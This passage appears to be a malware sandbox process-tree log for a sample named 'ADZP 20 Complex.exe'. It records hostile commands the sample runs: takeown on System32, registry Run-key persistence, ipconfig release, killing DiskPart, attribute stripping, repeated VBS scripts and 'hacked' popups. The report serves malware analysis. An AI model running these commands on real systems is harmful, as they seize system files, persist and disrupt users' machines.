      4⤵
      Drops autorun.inf file
      Drops file in System32 directory
      PID:2672
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:1688
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:2212
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:572
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:1044
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:1984
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:868
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:2584
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:2652
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2964
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Drops autorun.inf file
        Views/modifies file attributes
        
        PID:1880
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:824
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:668
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:2552
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:2540
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:1892
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:2328
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:3208
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:3552
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:3904
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:3184
    - - C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        5⤵
        
        PID:3240
    - - C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        5⤵
        
        PID:3412
    - - C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        5⤵
        
        PID:3672
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3816
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5199.tmp\519A.tmp\519B.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        Drops autorun.inf file
        Drops file in System32 directory
        
        PID:4624
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:4336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:4960
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:4008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4840
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:6572
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:4608
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:5336
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:5460
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5548
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:9840
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:6024
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:10028
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10976
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:10620
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:11752
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:12460
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:14848
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:15896
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:16628
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:17460
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:17728
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3828
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3860
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3888
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3956
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3968
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4FE4.tmp\4FE5.tmp\4FE6.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        Drops autorun.inf file
        Drops file in System32 directory
        
        PID:4516
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:3352
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:3252
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4444
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:6556
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:4944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:5196
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:5408
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5596
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:9884
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:6048
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:6296
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:4460
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:10324
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:12664
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:13396
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:14624
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:14708
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:17272
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:17832
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:18300
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3976
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:4076
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3076
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3144
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2452
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5310.tmp\5311.tmp\5312.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        Drops autorun.inf file
        Drops file in System32 directory
        
        PID:4900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:4292
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:4812
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:5156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:5204
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6616
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:5272
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:5428
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:5528
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5580
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:9360
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:6792
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:5136
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:4208
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:11064
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:4836
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:12336
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:12848
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:15300
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:15484
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:17380
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:17068
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:16248
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        7⤵
        
        PID:16468
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3320
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3372
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3384
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3916
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:3620
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:3988
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:2320
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:4224
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:4688
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:5012
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:7492
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\81BD.tmp\81BE.tmp\81BF.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:12752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:12444
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:14424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:14964
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:15212
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:15952
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:8436
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        
        PID:17056
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:7528
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:7572
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7612
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:7628
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:7704
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A4E7.tmp\A4F7.tmp\A4F8.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:6968
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:14272
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:13440
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:15856
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:16080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16368
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16308
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:14832
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        
        PID:16400
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:7724
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:7740
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7780
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:7820
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:7840
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B99F.tmp\B9A0.tmp\B9A1.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:14288
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:14956
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:15048
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:15152
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:6292
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:8928
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:17096
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:7952
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:7980
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:8000
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:8048
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:8064
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A4F6.tmp\A4F7.tmp\A4F8.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:12852
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:14076
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:13980
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:15848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:16088
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16352
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16012
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:16064
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        
        PID:16632
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:8084
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:8112
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:8132
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:8184
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:7172
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B25E.tmp\B25F.tmp\B260.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:14116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:13900
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:14412
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:16036
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:15644
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:17184
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:9856
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3296
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:2936
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:1392
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:7736
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:4244
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B700.tmp\B701.tmp\B702.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:13424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:14492
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:15824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:16336
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16248
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16452
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:17528
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:7136
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:7276
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:8196
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
